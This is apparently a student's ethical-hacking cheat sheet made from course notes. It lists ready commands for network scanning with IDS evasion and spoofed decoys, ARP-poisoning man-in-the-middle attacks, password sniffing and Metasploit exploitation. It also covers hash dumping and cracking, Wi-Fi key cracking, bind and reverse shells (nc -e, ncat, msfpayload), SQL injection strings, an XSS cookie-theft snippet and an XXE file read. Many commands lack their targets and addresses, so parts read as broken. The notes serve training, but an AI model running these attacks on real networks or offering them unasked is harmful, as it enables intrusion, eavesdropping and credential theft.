Ethical Hacking Cheat Sheet


Notes from INFOSEC’s Ethical Hacking and Ethical Hacking Certification self-study courses, as well as TryHackMe.

Passive Intelligence


Get name servers

dig @ ns

Get mail servers

dig @ mx

Get all records / zone transfer

dig @ axfr

AXFR is used to replicate DNS databases, so it will pull all records. It may not be allowed by the server, however.

Reverse lookups

dnsrecon -n -r

-n specifies the name server, and -r the range.

This relies on the DNS server storing reverse records.

DNS proxy / mitm

This is especially useful when we cannot force an application to use a proxy server of our choosing, such as applications that ignore OS HTTP proxy settings.

sudo dnschef

Without parameters, runs as a proxy, which allows us to intercept requests.

sudo dnschef --interface=<if> --fakeip=

This intercepts requests for and resolves them to

Debug it by running dig against it with the @ option to specify the name server:

dig @


This part of the course doesn’t look very passive to me, but it is taught in the passive intelligence section.

Find community strings

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt

Enumerate entries

snmpwalk -v 2c -c secret

Use the appropriate version (-v) and community string (-c).

Enumerate processes (OID)

snmpwalk -v 2c -c secret

Use other OIDs to enumerate different values of the system.

Enumerate processes (MIB)

snmpwalk -v 2c -c secret hrSWRunName

Network discovery

sudo netdiscover -r

Network Reconnaissance


sudo netdiscover

Passively discovers hosts on the network by listening for ARP and other types of packets.


Remember to use -vv for increased verbosity on all scans.

Ping scan/sweep (no port scan)

nmap -sn

List scan

nmap -sL

Performs reverse DNS lookups, like dnsrecon. Does not send any packets to the target hosts.

Firewall/IDS Evasion

No ping:

nmap -Pn

Use in combination with other scans.

Nmap typically pings the host to check whether it is alive before scanning it. Firewalls such as the Windows Firewall drops ICMP ping requests, however, making the host appear to be offline. -Pn tells nmap to scan the host directly without pinging it first.

See Firewall/IDS Evasion and Spoofing for more Firewall/IDS evasion techniques.


nmap -f
nmap -mtu <size>

Makes scan packets less detectable by an IDS.

Use a bad checksum:

nmap -badsum

A host will drop packets with bad checksums. A firewall may reply to it nevertheless. This can be used to determine if there is a firewall/IDS present.

Connect scan

nmap -sT

Half-open (“stealth”) scan

nmap -sS

UDP scan

nmap -sU


nmap -sN
nmap -sF
nmap -sX

Comma and range syntax

nmap -sT,124
nmap -sT

Use this to target multiple hosts.

Greppable output format

nmap -oG out.txt

Get IP addresses from a ping scan

nmap -sn -oG pingscan.txt
cat pingscan.txt | cut -f2 -d" "

Read and scan IPs from a text file

nmap -iL pingscan.txt

Test port 80

nmap -p 80

Connect-scan port 80

nmap -sT -p 80

Scan all TCP ports

nmap -sT -p-

-p- for all ports.

UDP scan port 53

sudo nmap -sU -p53

TCP + UDP scan

sudo nmap -sT -sU

Will simultaneously test target ports using TCP and UDP.

Protocol scan

sudo nmap -sO

Determines which IP protocols (TCP, ICMP, IGMP, etc) are supported by the target.

Service identification / version detection

nmap -sV

Performs service identification through banner grabbing. For HTTP, you can imagine this performing a HEAD request to identify the server and its version.

nmap -sV -p80

Script scan

Run scripts on the default set:

nmap -sC

Run all scripts in a category:

nmap --script malware

Run specific scripts:

nmap --script=snmp-sysdescr --script-args snmpcommunity=secret

Get help for a script:

nmap --script-help ftp-anon.nse

Script location: /usr/share/nmap/scripts

Script database: /usr/share/nmap/scripts/script.db - This includes script categories.

Script categories (full list):

See NSEDoc for a full list of scripts.

TLS cipher scan

nmap --script ssl-enum-ciphers -p 443

Returns cipher suites and compressors used by the server, graded A-F based on strength.

Shellshock test

nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/

MySQL brute force

nmap -p 3306 --script mysql-brute

Understanding and debugging nmap

Use the --packet-trace option to print a summary of packets sent and received by nmap. Applies to all types of scans, not just -sn in this example.

nmap -sn --packet-trace


Used to craft custom packets. Can be used for all sorts of things.

Scan port 80

sudo hping3 -I interface -S -p 80

Scan a range of ports

sudo hping3 -I interface -S --scan 1-81

Spoof the source IP

sudo hping3 -I interface -S -a -p 80

If port 80 is open on the target, the target will reply to

Scanning on mobile

Install BusyBox to get GNU tool replicas on the phone.

ARP ping

busybox arping

Port scan

busybox pscan


Nmap builds are available for mobile. Install nmap on the device. See command reference above.

Stealthy Network Recon

Nmap options

Nmap timing template

nmap -T <polite | sneaky | paranoid | ...>

Use this for different degrees of stealth / scanning speed.

Nmap scan delay

nmap --scan-delay 2s

Nmap waits at least this amount of time between each probe it sends to the target.

SYN scan

nmap -sS

Sends a SYN and waits for the response. If the response is SYN/ACK, assumes the port is open; if it’s RST, assumes it is closed. In the first case, Nmap will not send the final ACK to complete the handshake.

This is actually the default scan option for nmap (needs root, otherwise falls back to a TCP connect() scan, -sT).

FIN scan

nmap -sF

If the port is closed, the target will respond with RST. If the port is open, the target does not respond and instead ignores our FIN packet.

Windows is an exception to the above: it always responds with a RST, so it will appear that ports are always closed. On the bright side, if we know a given port is open and we see this behaviour with FIN scans, then we know the target is a Windows host.

Will trigger any decent IDS like snort, so not really decent in practice.

XMAS scan

nmap -sX

Same response behaviour as in the case of FIN scans.

Will trigger any decent IDS.

Null scan

nmap -sN

Same response behaviour as in the case of FIN and XMAS scans.

Will trigger any decent IDS.

Idle scan

sudo nmap -sI zombie target

Scans ports on the target by spoofing packets that appear to come from a third host. The third host is probed for its IPID, which usually increments sequentially. The third host is required to be idle to make the IPID increments predictable.

Decoy scan

sudo nmap -sS -p80 -D1.1.1.1,,,

This will scan the target, but it will also spoof packets that appear to be coming from the given decoy IPs. It will look as if those IPs are also scanning the network.

See the ME and RND options for the manual for more. ME inserts your IP at a specific point in the list (its position is otherwise randomized). RND generates a random, non-reserved IP address.

ICMP timestamp request

sudo nmap -sn -PE -PP --send-ip

By default, Nmap uses ping / icmp requests for host discovery. Many hosts have ping turned off to appear to be unreachable, however, in an attempt to dodge scanners.

Instead, we can get Nmap to send ICMP timestamp requests (13), which a host might not be blocking. -PE enables the feature, -PP specifies an ICMP timestamp request. --send-ip asks Nmap to send packets via raw IP sockets.

Subnet mask request

sudo nmap -sn -PE -PM --send-ip

Similar comments as in the case above in terms of stealth and motivation.

Fragmentation scan

sudo nmap -f -sS

A fragmentation scan (-f) will send tiny fragmented IP packets to the target in an attempt to evade IDSs. This splits up TCP headers over several packets to make it harder for IDSs to detect the scan.

(The example above uses -sS for a SYN scan, but you can combine -f with other types of scans.)

Packet Sniffing


Sniff port 80

sudo tshark -i interface -f "tcp port 80"

Sniff icmp

sudo tshark -i interface -f "icmp"

Finding and Exploiting Vulnerabilities


Check all

sudo lynis -c

Run all tests.

Pentest scan

sudo lynis --pentest

For when you don’t have root privileges.

Quick and quiet

sudo lynis --pentest -q -Q

Quick (-Q) and quiet (-q) scan which does not prompt for user input and reports only warnings.

Log and report

sudo cat /var/log/lynis-report.dat
sudo cat /var/log/lynis.log

Check the report and logs for more details on the results of a scan.


Start database service

msfdb init

Start metasploit framework console

msfconsole -L

Import Nessus report

db_import report.nessus

Search for vulnerability in the report

vulns -S shellshock

Replace shellshock with the vulnerability you are looking for.

Search for exploits for a vulnerability

search osvdb:112004

In this example we use the vulnerability’s OSVDB ID.

Launching an exploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options
# Set exploit-specific parameters.
set TARGETURI /cgi-bin/

show payloads
set PAYLOAD linux/x86/shell/reverse_tcp


Generic Payload Handler

use exploit/multi/handler

Provides the Metasploit payload system to exploits launched outside of the framework. Launches a listener that the exploit can connect to.


Crack FTP

hydra -L users.txt -P passwords.txt -vV ftp

For separate user and password files.

hydra -C accounts.txt -vV ftp

For a file with lines formatted as user:password.



To experiment with sniffing and MITM, you can set up virtual networks on your machine using Mininet.

For ARP posioning, specifically, see mininet_tcp_hijacking.

Start mininet


Run command on host inside the Mininet prompt

h1 date

h1 is the host; it could be h1, h2, h3, etc. date is the command we are running in this particular example.

Run command on host

mininet/m h1 date

Use the m tool provided by mininet.

ARP Poisoning

Enable forwarding

For a MITM, enable forwarding to avoid breaking the target’s traffic:

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Write and display:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Poison a specific target

sudo arpspoof -i eth0 -t

This makes believe that we are The latter could be the gateway, for example.

To sniff the traffic between two hosts, we must poison both.

Poison the entire subnet

sudo arpspoof -i eth0

Simply leave the target (-t) option out to poison the entire subnet.

Sniff passwords

dsniff -i eth0

Perform a MITM using ARP poisoning first to sniff passwords from a target.


Ettercap automates ARP poisoning setups for MITM attacks and is also able to dissect packets for various application-layer protocols.

MITM all hosts on the subnet

ettercap -T -i eth0 -M arp:remote -L /tmp/mitm ///

The -L option makes Ettercap create two files:

Read eci/ecp

etterlog /tmp/mitm.eci


driftnet -i eth0

Sniffs for images in the traffic.

DNS spoofing

dnsspoof -i eth0 -f hosts_file

dnsspoof forges replies to DNS address / pointer queries. Set up a MITM first with ARP poisoning.



Sits as a proxy between a web client and a web server.

Social Engineering Toolkit (SET)

Among many other things, SET can set up Website clones that deliver exploits to the visitor. These can be browser-specific, or it can be autopwn, which detects the browser and attempts the relevant exploits. The payload can be meterpreter. SET can also be used for credential stealing and other attacks.


packetrecorder (meterpreter)

List interfaces

run packetrecorder -li


run packetrecorder -i 1

Select the appropriate interface.

Cracking Wi-Fi

Use aircrack-ng to capture traffic first.

Inspect captured traffic

tshark -r capture.pcap

Crack a WEP key

aircrack-ng capture.pcap

Crack WPA2 key

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.pcap

This crack relies on a word list. The rockyou.txt word list is directly available on Kali Linux.

Cracking Passwords

Windows Lanman passwords

Windows stores LM hashes alongside NTLM hashes unless configured otherwise through a registry key. This is for backwards compatibility to authenticate with lder systems.

Dump hashes with pwdump2

pwdump2 > hashes.txt

Use pwdump2 to dump password hashes. This injects a DLL into lsass.exe to read the SAM file.

Dump hashes with meterpreter

run hashdump

Crack with John the Ripper

john hashes.txt

If you know the format:

john hashes.txt --format=nt2

Cracking MD5 hashes using a wordlist:

john hashes.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt

Crack with Cain & Abel

On Windows, you can also crack the passwords with Cain & Abel. john also exists for Windows.

Linux passwords

Unshadow passwords

unshadow passwd shadow > passwords.txt

Get the /etc/passwd and /etc/shadow files from the target, then unshadow them. unshadow is part of the John the Ripper package. It combines both the shadow and passwd files so that John can use them.

Crack passwords

john passwords.txt

Where passwords is the file resulting from the unshadow step above.

Crack passwords using a wordlist

john passwords.txt -w=wordlist.txt

View passwords

john --show passwords.txt

passwords.txt is the same file that was given to John to crack.

Covert Channels and IDS Evasion


Run in IDS mode

snort -A console -i eth0 -c /etc/snort/snort.conf -l /var/log/snort -K pcap

-A is for alerts, which are displayed on the console.

Packet capture - text mode

snort -dev -i eth0 > capture.txt

Custom rules file


Alert on ICMP requests to any host on the network

alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001;)

Alert on FTP connections

alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)

Not that this rule does not actually care whether the connection succeeds / an FTP server is actually running. It simply reacts to the traffic.

Alert on message content

alert tcp any any -> $HOME_NET any (msg:"System file access"; content:"cat /etc/passwd"; sid:1000003;)

This will alert whenever the string cat /etc/passwd is found in a request.

Encrypted ncat

ncat --ssl -l -p 999 -e /bin/sh

Listens on 999 and drops a shell upon receiving a client connection. The channel is encrypted with SSL.


This transmits messages by hiding them in TCP/IP headers, transferring one byte at a time.

Start the listener

sudo covert_tcp -dest localhost -source localhost -source_port 10000 -dest_port 20000 -server -file /tmp/receive/file.txt

Send the message

sudo covert_tcp -dest localhost -source localhost -source_port 20000 -dest_port 10000 -file /tmp/send/file.txt

Using Trojans and Backdoors


nc -L -p 2000 -k -e cmd.exe

Gets netcat to listen (-L) on port 2000 (-p 2000) and bind a shell (-e cmd.exe) upon receiving a connection. -k makes netcat continue listening even after the client disconnects.

Buffer Overflow Exploits


See Spike. Tutorial here.

Generate payloads with metasploit

Port bind in Perl

msfpayload windows/shell/bind_tcp LPORT=4444 P

This generates port bind shellcode in Perl (P) format that listens on port 4444.

Reverse shell executable

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=5555 X > payload.exe

Exploiting Common Web Application Vulnerabilities

SQL Injection

' or 1=1#
' or 1=1;--

Bash injection

; echo hi


Test for XSS

var i = new Image();
i.src="" + document.cookie;

The grabcookie.php script would read the cookie URL parameter and write it to a file.

More XSS Payloads

XSS Payloads


Test for XXE

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>

PHP injection

Test for injection


Run OS command




Find programs that a user can run with sudo

sudo -l -U user_name